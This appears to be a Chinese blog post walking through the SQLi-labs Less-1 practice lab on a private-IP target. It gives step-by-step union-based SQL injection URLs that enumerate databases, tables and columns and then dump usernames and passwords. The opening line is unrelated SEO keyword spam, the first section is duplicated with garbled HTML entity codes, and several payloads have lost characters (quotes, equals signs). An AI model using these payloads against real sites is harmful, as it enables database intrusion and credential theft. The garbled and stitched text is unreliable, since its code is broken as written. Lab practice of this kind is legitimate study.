要想浏览国外网站 应该怎么做,私密浏览器在线观看,做cps要做什么类型的网站,企业门户模板靶场及环境配置参考
一#xff0c;工具准备。
推荐下载火狐浏览器#xff0c;并下载harkbar插件#xff08;v2#xff09;版本。hackbar使用教程在此不做过多描述。 补充#xff1a;url栏内部信息会进行url编码。
二#xff0c;SQL注入-less1。
1#xff0c;判断传参…靶场及环境配置参考
一工具准备。
推荐下载火狐浏览器并下载harkbar插件v2版本。hackbar使用教程在此不做过多描述。 补充url栏内部信息会进行url编码。
二SQL注入-less1。
1判断传参方式。
先输入
http://192.168.61.206:8001/Less-1/?id1 //查看是否有回显
有回显说明是get类型的传参。
尝试其他参数以确认漏洞存在。
http://192.168.61.206:8001/Less-1/?id2 2判断闭合符闭合所输入的语句以使得后续的SQL语句溢出达到运行的目的。 得知闭合符是单引号。
3判断有几个字段。
order by对结果集进行列排序。
在url栏输入
http://192.168.61.206:8001/Less-1/?id1order by 3 --
-- //注释掉后续的的代码以让输入的语句的得以执行。
order by 3 不报错。
order by 4 报错说明此处只有三个字段。
4查库名。
使用select和 datebase指令在此处利用union联合查询以获取库名。
http://192.168.61.206:8001/Less-1/?id-1 union select 1,database(),3 --
union查询可以select多条语句并用只能select可以显示没有的东西。
union:两个sql语句一起查询两张表具有相同的列数且字段名是一样的。
展示空间不够前面会覆盖后面内容所以接下来用-1,让前面命令执行不成功以显示后续的内容。
database()为查询库名。 得到数据库名。
5查询数据库内的表名。
http://192.168.61.206:8001/Less-1/?id-1 union select 1,table_name,3 from information_schema.tables where table_schemadatabase() --
注意MySQL自带的几个特殊库.
MySQL自带Information_schema库。
Information_schema库里有两个特殊的表。
表tables记录了库名和表名。
表columns库里面有什么表表里面有什么字段。
table_schema记录了所有库的库名。
table_name.记录了表。
column_name:记录了字段。
6多次重复此操作需要改LIMIT以获得所有表名。
http://192.168.61.206:8001/Less-1/?id-1 union select 1,table_name,3 from information_schema.tables where table_schemasecurity LIMIT 1,1 --
LIMIT1,表示从第二行开始取,取一行。
7得到字段名。
http://192.168.61.206:8001/Less-1/?id-1union select 1,2,group_concat(column_name) from information_schema.columns where table_nameusers--
8得到敏感信息。
http://192.168.61.206:8001/Less-1/?id-1 union select 1,2,group_concat(username , password) from users--
三总结。
sql注入为入门级的漏洞现如今已经极为少见但仍有其典型性。从此开始便正式进入了黑客的大门。